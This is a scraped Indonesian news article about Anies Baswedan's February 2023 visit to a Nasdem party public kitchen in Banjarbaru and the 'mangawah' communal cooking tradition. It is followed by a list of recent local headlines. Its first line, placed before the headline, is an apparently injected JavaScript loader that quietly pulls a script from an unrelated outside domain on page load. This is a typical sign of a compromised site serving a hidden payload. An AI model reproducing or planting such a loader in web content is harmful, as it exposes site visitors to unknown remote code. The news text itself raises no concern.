(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Lawatan Anies di Kalsel, Lihat Langsung Tradisi “Mangawah” Relawan di Dapur Umum Himalaya


KANALKALIMANTAN.COM, BANJARBARU – Lawatan Anies Rasyid Baswedan di Kota Banjarbaru, Kamis (16/2/2023) siang, terus berlanjut. Setelah singgah di The Breeze Water Park, Anies Rasyid Baswedan langsung menuju kediaman H Mansyur, Ketua DPW Nasdem Kalsel di Jalan Himalaya, Kelurahan Loktabat Selatan, Kecamatan Banjarbaru Selatan.

Kedatangan Anies di rumah H Mansyur dalam rangka meninjau aktivitas di dapur umum yang diselenggarakan langsung oleh Dewan Pengurus Wilayah (DPW) Partai Nasdem Kalsel untuk para simpatisan yang hadir menyambut kedatangan Anies di Banua.

Anies Baswedan mengatakan maksud kedatangan dirinya ke Kalsel ini bertujuan saling bertegur sapa dengan masyarakat Kalsel dan tentunya agenda dirinya di Kalsel lebih banyak silaturahmi dengan masyarakat guna lebih saling mengenal dan bertemu secara langsung.

 

Baca juga: Sanksi Perda Miras di Banjarbaru Kelewat Ringan, Satpol PP Tak Kuasa Tutup Toko Penyedia Miras

“Tentu dalam pertemuan itu ada yang disampaikan, tapi lebih banyak mendengarkan, membaca dan observasi,” ujarnya.

Saat meninjau dapur umum di Jalan Himalaya Banjarbaru, Anies menilai sambutan di dapur umum “mangawah” -memasak falam.jumlah besar- dan makan bersama sangat unik bagi dirinya.

Menurutnya tradisi “mangawah” di Kalsel sangat luar biasa setelah melihat prosesi lewat video yang dikirim oleh para relawan.

“Masak bersama ini tradisi kebersamaan yang harus dirawat kedepan,” ujarnya.

Dengan adanya pertemuan ini, tentu kata Anies, dirinya mengharapkan bisa mempererat rasa kebersamaan satu sama lain.

Baca juga: Komisi VI DPR RI Apresiasi PLN Atasi Oversupply melalui Optimasi Kontrak IPP Hingga Rp47 Triliun

Menurutnya, bertemu secara langsung dengan masyarakat merupakan kebahagiaan tersendiri bagi dirinya, apalagi dengan masyarakat Kalsel yang begitu ramah, tangguh dan pekerja keras.

“Mudah-mudahan bisa bertemu dengan banyak masyarkat di sini,” tuntasnya.

Sementara itu, Ketua DPP Partai Nasdem, Sugeng Suparwoto mengatakan kedatangan dirinya ke Kalsel disamping silaturahmi juga memiliki kewajiban untuk memperkenalkan calon presiden usungan Partai Nasdem kepada pengurus daerah.

Dirinya menilai antusias masyarakat sangat luar biasa, banyak relawan yang hadir dan ada juga dari beberapa partai Demokrat dan PKS.

“Inilah sebuah kebersamaan,” ujarnya.

Baca juga: Tiba di Banjarbaru, Anies Langsung Diserbu Massa 

Diungkapkan Sugeng, disamping bersilaturahmi, dirinya ingin mendengarkan suara kemasyarakatan dengan membawa tagline besar bagi keadilan sosial bagi seluruh rakyat Indonesia.

“Setiap wilayah nantinya akan berbeda-beda (pendekatannya), maka perlu calon presiden yang langsung turun ke bawah (daerah),” tuntasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

31 menit ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

48 menit ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

14 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

14 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

15 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

15 jam ago

This website uses cookies.